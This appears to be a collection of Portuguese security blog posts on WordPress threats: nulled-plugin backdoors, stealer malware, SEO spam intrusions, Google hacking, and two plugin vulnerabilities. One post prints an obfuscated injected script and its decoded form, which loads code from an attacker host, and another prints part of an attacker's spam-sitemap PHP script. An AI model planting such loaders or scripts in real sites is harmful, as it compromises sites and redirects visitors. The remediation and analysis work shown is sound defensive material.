Para responder essas perguntas decidimos baixar um plugin pirata de um site que oferece os temas e plugins nulled, instalar em um ambiente controlado e ver as alterações e quais os perigos que quem instala plugins e temas nulled estão correndo.

Baixamos o arquivo do plugin e antes mesmo de instalar realizamos um scan com assinturas comerciais do clamav e ja encontramos o primeiro problema:

A assinatura já nos da uma pista do malware que está nesse arquivo porém vamos analisar mais a fundo:

Em uma rápida analise o código acima faz:

• Cria um usuário administrador oculto com login fixo (default) e senha pré-definida.
• Esconde esse usuário da listagem de administradores no painel WordPress, alterando queries e contadores.
• Envia informações do site (URL e data) para um servidor externo (llllll.my).
• Injeta código malicioso em arquivos sensíveis (footer.php, functions.php, formatting.php) de todos os temas.
• Carrega código remoto de outro servidor (panel.hac…..) sempre que o site é acessado.
• Desativa cache no site para garantir que os scripts maliciosos sempre sejam executados.
• Se instala de forma persistente, dificultando a detecção e remoção.

Então resolvemos instalar o plugin e analisar o comportamento.

Após o pluign instalado o que olhamos primeiro é a tabela de usuários

Na tabela de usuários pelo wordpress não existe nenhum usuário maliciosos, mas se formos direto no banco de dados:

Isso acontece por causa desse trecho de código, que esconde o usuário no backend do wordpress:

Note que o código acima tem o usuário e a senha do user malicioso, o nível de acesso do usário e a opção para esconder o mesmo no admin bar, dificultando a vida de quem não possui um conhecimento mais técnico para remoção das infecções.

Seguindo em frente, o seguinte código foi adicionado no footer do tema, direcionando os visitantes para sites de spam, comprometendo o trafego do site, SEO e resultados de mecanismos de busca.

Por último o script envia os dados do site para um site terceiro, avisando que aquele site está sob controle do invasor:

Com isso completa-se a análise, chegando a conclusão de que nunca se deve utilizar plugins ou temas de fontes duvidosas, além de você não ter suporte para aplicação você estará entregando seu site para terceiros realizarem envio de spam, ataques a outros hosts ou hospedagem de phishing.

O post Plugins Piratas – Análise técnica apareceu primeiro em ETH SECURITY.

Um malware stealer se trata de um malware capaz de roubar informações que ficam salvas em navegadores web e/ou estão em seu computador. Sim, seus usuarios e senhas, preenchimento de formulários, dados do cartão de crédito, programas instalados e cookies de sessão são os principais alvos desses agentes maliciosos.

Os “Malwares Ladrões”, na tradução literal, estão cada vez mais comuns como ameaça cibernética, visto que os dados são informações valiosas no submundo, onde ocorrem a venda dessas credenciais. Essas informações de usuários e senhas são comercializados para aplicação de golpes, também podem dar acesso a contas corporativas, contas bancários, informações pessoais e muitos outros usos indevidos a partir dos dados roubados.

Buscando na web por Roubo de credenciais é possível ver que há várias noticias sobre o assunto e, infelizemente, o Brasil é recorde nessa questão.

Alguns nomes conhecidos são Redline, ZeuS, Raccoonmas há muitos outros, e novos irão surgir.

E como eles se propagam? Infelizmente por vários meios. Alguns mais comuns são:

• Anexos de e-mail maliciosos:um pdf, um docx malicioso recebido por email pode fazer a instalação do malware caso não seja detectado imediatamente.
• Downloads de softwares piratas ou não confiável:sabe quando voce baixa um arquivo executavel em um site de downloads? Tipo aquele pra baixar musica em MP3 do youtube ou aquele APK que te da o jogo do celular cheio de moedas. Nem sempre esses executáveis são seguros, pode ser que embutido no código esteja o malware que infecta o computador ou celular roubando os dados.
• Softwares ou extensões vulneráveis:Deixar o software sem as atualizações de segurança também permite a instalação do malware. Baixar extensões no navegador sem conhecer o fabricante ou quem a desenvolveu também coloca em risco as informações

É possivel evitar ser infectado ou detectar a ameaça? Sim, há algumas dicas que são importantes e podem ser lembradas facilmente:

• Revise suas senhas de tempos em tempos, nas configurações do próprio navegador há alertas para alguns vazamentos. Revise também sites antigos os quais você não acessa mais.
• Ative o Duplo Fator de Autenticação em tudo o que for possível, isso pode dar um alerta caso alguem tente acessar sua conta sem sua permissão. Pode ser por email, porém o recomendado é ter o login vinculado a um código de OTP, como aplicativo Google Authenticator.
• Mantenha seu software de segurança atualizado, sempre é recomendado usar um antivirus confiavel instalado.(Baixado diretamente do site do fabricante para não correr o risco de ter o malware instalado pelo proprio anti-malware)
• Não instale qualquer extensão em seu navegador apenas para facilitar o dia-a-dia. Sabe os termos de privacidade? Pegue o costume de ler, se estiver escrito algo como “compartilhamos seus dados com terceiros” é um sinal de alerta, ou se não houver nenhum termo é um sinal vermelho de alerta. Busque extensões de grandes empresas ao invés de extensões que ainda não possuem um procedimento de segurança bem elaborado.
• Fique atento caso note comportamentos inesperados de seu computador, uma lentidão fora do comum, pop-ups aparecendo sem horário definido, notificações do tipo “encontramos 42 virus no seu computador, clique aqui para limpar” sem ter nenhum sistema que faça essa verificação.
• Verifique o Gerenciador de Tarefas, nele é possível ver todos os processos em execução, incluindo os maliciosos. Pesquise pelo nome dos processos para entender o que eles fazem e se são nocivos ao seu computador.
• Analise os arquivos suspeitos em um serviço online confiável. Aqui indico o Virus Total(www.virustotal.com). Ele possui a análise online de URLs e arquivos e indica caso seja um arquivo ja identificado como malicioso anteriormente.

  Fonte: Texto publicado no meu linkedin, o qual agora, compartilho tambem no blog do ETH Security

O post Você sabe o que é um “Malware Stealer”? apareceu primeiro em ETH SECURITY.

Essa é uma péssima notícia, pois toda sua indexação e SEO no Google foram perdidos e substituídos por conteúdo de SPAM, com isso seu site começa a receber várias requisições do Google, o que faz com que cause até mesmo a indisponibilidade, é assim que muitos detectam a invasão, devido as várias requisições de bots de buscadores.

Como isso ocorre?

A grande maioria dos casos são devido ao roubo de credenciais do wp-admin, sendo assim o cuidado com suas credencias sempre deve ser redobrado, inclusive com o email que é utilizado para o usuário administrador do WordPress.

Uma vez acessada a área administrativa do WordPress, o invasor utiliza o theme-editor para remover o conteúdo original de uma página, como o 404.php e substituíla por um backdoor, que dará acesso a todo o conteúdo FTP do site.

Com acesso ao FTP o invasor pega a propriedade do site alvo no Google, o que lhe permite solicitar indexação de conteúdo, então envia as páginas de spam a erem indexadas para alguns diretórios no site, geralmente arquivos html, e solicita que o Google as indexe através de um sitemap, segue um exemplo de script utilizado para isso:

<?php
@set_time_limit(3600);
@ignore_user_abort(1);
$xmlname = ‘mapss182_183.xml’;
$jdir = ”;
$smuri_tmp = smrequest_uri();
if($smuri_tmp==”){
$smuri_tmp=’/’;
}
$smuri = base64_encode($smuri_tmp);
$dt = 0;
function smrequest_uri(){
if (isset($_SERVER[‘REQUEST_URI’])){
$smuri = $_SERVER[‘REQUEST_URI’];
}else{
if(isset($_SERVER[‘argv’])){
$smuri = $_SERVER[‘PHP_SELF’] . ‘?’ . $_SERVER[‘argv’][0];
}else{
$smuri = $_SERVER[‘PHP_SELF’] . ‘?’ . $_SERVER[‘QUERY_STRING’];
}
}
return $smuri;
}
$sitemap_file = ‘sitemapwebxml’;
$num = 100;
$mapnum = 25;
$kid = rand(1,9009);

O que fazer?

Infelizmente essa é a invasão que mais causa prejuízo a longo prazo para a imagem de seu site na internet, pois o trabalho para remover as urls de spam dos resultados do Google é demorado e exaustivo, demorando até alguns meses.

Primeiramente pegue novamente a propriedade de seu site no Google usando esse tutorial, depois  remova todos os usuários que não seja você que estiverem com a propriedade do site no Google para evitar que novas requisições sejam feitas.

Coloque o site em modo de manutenção e realize um scan completo para remover todos os malwares do site, caso tenha dificuldades para realizar esse procedimento de scan, nossa equipe tem um serviço de scan que pode lhe auxiliar a remover as infecções.

Altere todas as suas senhas e verifique todos os computadores que você utiliza, inclusive celulares, com um antivírus atualizado.

Com as infecções removidas e as páginas também o conteúdo começará a dar 404 para as requisições no Google, o que fará com que sejam removidos os resultados do Google gradualmente.

Para fazer com que seu site seja indexado pelo Google novamente é recomendável que crie e faça upload de um sitemap para que suas páginas sejam indexadas, este tutorial mostra como realizar.

Dúvidas? basta comentar abaixo.

O post Invasão site com resultados em Japonês no Google, o que fazer? apareceu primeiro em ETH SECURITY.

Conceito:

Como o Google e outros buscadores funcionam? talvez alguns respondam que ele indexa páginas da web e mostra os resultados em suas pesquisas, mas como ele faz isso? Imagine que você vai até uma cidade desconhecida e tem um amigo que mora lá há alguns anos, você precisa se deslocar até certos lugares que não conhece, então você pergunta a esse amigo onde esses lugares ficam e ele te instrui corretamente a melhor maneira de como encontrar os lugares, como isso é possível? Porque ele já esteve lá antes, o Google trabalha dessa mesma maneira, ele sabe o conteúdo dos sites porque já esteve la antes, já os visitou e indexou em seu banco de dados com os seus bots, seus buscadores que indexam os sites e os resultados são organizados em sua base de dados para que sejam mostrados nas pesquisas.

Controlando a indexação:

Existe uma maneira de você controlar o que o Google e outros buscadores indexam em seu site, no arquivo robots.txt você pode definir os buscadores que poderão enxergar em seu site e o que poderão indexar, para que somente o conteúdo público seja mostrado.

Perigos:

Assim como o Google indexa suas páginas ele também pode indexar tudo o que está na raiz de seu site, onde estão os scripts que fazem o mesmo funcionar, através desta técnica de busca é possível encontrar endereços em que seus administradores deixaram arquivos que oferecem um grande risco a segurança, usando como exemplo do WordPress existem 3 grandes perigos.

Backups da base de dados:

Uma base de dados na raiz do site fica disponível para download com várias informações críticas de segurança, as mais críticas são o usuário e o hash da senha, com essas informações em mãos um terceiro mal intencionado pode fazer um ataque de bruteforce no hash e conseguir acesso à área administrativa de seu WordPress.

Backup compactado de seus arquivos:

Da mesma maneira que alguém encontra  um arquivo .sql com o Google Hacking, é possível encontrar arquivos compactados, como o zip ou tar.gz, no caso do WordPress dentro desse arquivo compactado estará o wp-config.php, expondo assim o usuário e senha do banco de dados, fazendo com que seja possível acessar o mesmo e alterar a senha ou adicionar um novo usuário administrador.

WordPress sem o wp-config.php configurado:

Este é o mais perigoso entre eles, pois caso você deixe uma instalação do WordPress em branco em seu docummet root, invasores buscarão por essa falha e quando a encontrarem  farão uma nova instalação do WordPress utilizando uma base de dados externa, dando-lhe total acesso administrativo para upload de backdoors, páginas de phsihing e outros tipos de pragas virtuais que assolam vários sites pelo mundo.

Conclusão:

Com isso vemos que é preciso deixar somente o necessário na raiz de seu site e evitar deixa-lo como repositório para evitar surpresas desagradáveis, caso tenham algum dúvida sobre o conteúdo fiquem a vontade para se expressar nos comentários.

O post Proteja seu site: Como evitar o Google Hacking. apareceu primeiro em ETH SECURITY.

Mais de 40.000 instalações do WordPress que utilizam esse plugin, segundo o site do desenvolvedor, tem sofrido ataques de Cross Site Scripting (XSS), técnica que tem por objetivo inserir conteúdo não autorizado no site alvo.

A falha:

A função “manage_options” existente no arquivo /includes/init.php tem como objetivo atualizar as opções do plugin no banco de dados, a falta de uma verificação de autenticação de privilégios de usuários faz com que invasores possam inserir códigos no banco de dados, abaixo utilizamos um exploit para inserir um javascrit alert toda vez que um post novo for criado:

Abaixo o resultado da exploração:

Se você foi vítima dessa exploração encontrará uma linha similar nos logs do apache:

192.168.1.12 – – [16/May/2019:20:36:14 -0300] “POST /wp-admin/admin-ajax.php?action=cfs_ajax_handler HTTP/1.1” 200 562 “http://192.168.1.5/teste.php” “Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36”

Contra medida:

A atualização para esta falha já foi lançada pelo desenvolvedor, então a fim de se prevenir recomendamos atualizar o mais rápido possível.

Como a falha permite que strings e scripts js sejam inseridos no banco, a remoção irá depender do conteúdo que o invasor inseriu.

Caso seu site esteja redirecionando para sites maliciosos você pode contar com nosso serviço de remoção de malware para lhe auxiliar.

O post Vulnerabilidade no Plugin Custom Field Suit do WordPress apareceu primeiro em ETH SECURITY.

Infecção:

Uma vez explorada o invasor insere um código malicioso como da imagem abaixo:

<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>

O código descriptografado fica dessa maneira:

</style><script language=javascript>var elem = document.createElement(‘script’);

elem.type = ‘text/javascript’;

elem.async = true; elem.src = ‘hxxps://hellofromhony[.]org/counter’;

document.getElementsByTagName(‘head’)[0].appendChild(elem);</script>

Assim quando o site é acessado o usuário e redirecionado para sites maliciosos.

Removendo a infecção:

Primeiramente faça um backup de sua base de dados, pois caso dê algo errado você terá uma cópia de segurança.

Acesse seu PhpMyAdmin ou o gerenciador de banco de dados de sua preferência e clique na base de dados e em pesquisar, adicione a string “String.fromCharCode(118” ,sem aspas, no campo de pesquisa e clique em selecionar todas as tabelas e cliquem em executar no canto a direita:

Após isso você verá que o conteúdo foi encontrado na tabela wp_options:

Copie todo o conteúdo para um bloco de notas e remova exatamente o conteúdo que foi citado acima e substitua na tabela citada pelo conteúdo sem a infecção.

Contra medida:

Ainda não foi publicada uma atualização para o problema, então a recomendação é de que o plugin seja totalmente removido de sua instalação até que o desenvolvedor publique uma correção:

https://wordpress.org/support/topic/remove-this-plugin-immediately/

Como dito no vídeo criei um htaccess para que você possa se proteger dessa falha caso deseje manter o plugin, porém essa medida serve somente para esse tipo de ataque, pois o invasor pode alterar o modo como realiza a requisição, porém já é o bastante para bloquear o processo automático que ocorre nesse momento na internet:

RewriteEngine on
ErrorDocument 406 “<head><title>Bad Request!</title></head><body><h1>Blocked by Defensor Web!</h1><p>Hacking Attempt!. </p></body></html>”
RewriteEngine On
RewriteCond %{THE_REQUEST} “POST \/wp-admin\/admin-post\.php\?page\=yuzo-related-post HTTP\/1.1” [NC]
RewriteRule .* – [R=406,L]

As aspas podem colar incorretamente em seu htaccess, então disponibilizei o código raw no pastebin:

https://pastebin.com/GKYBv5Qt

Dúvidas e sugestões fiquem a vontade para se expressarem nos comentários.

Site infectado? Não consegue resolver?

Entre em contato agora com nossa consultoria especializada através do link Remoção de Malware em nosso site.

O post [Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção apareceu primeiro em ETH SECURITY.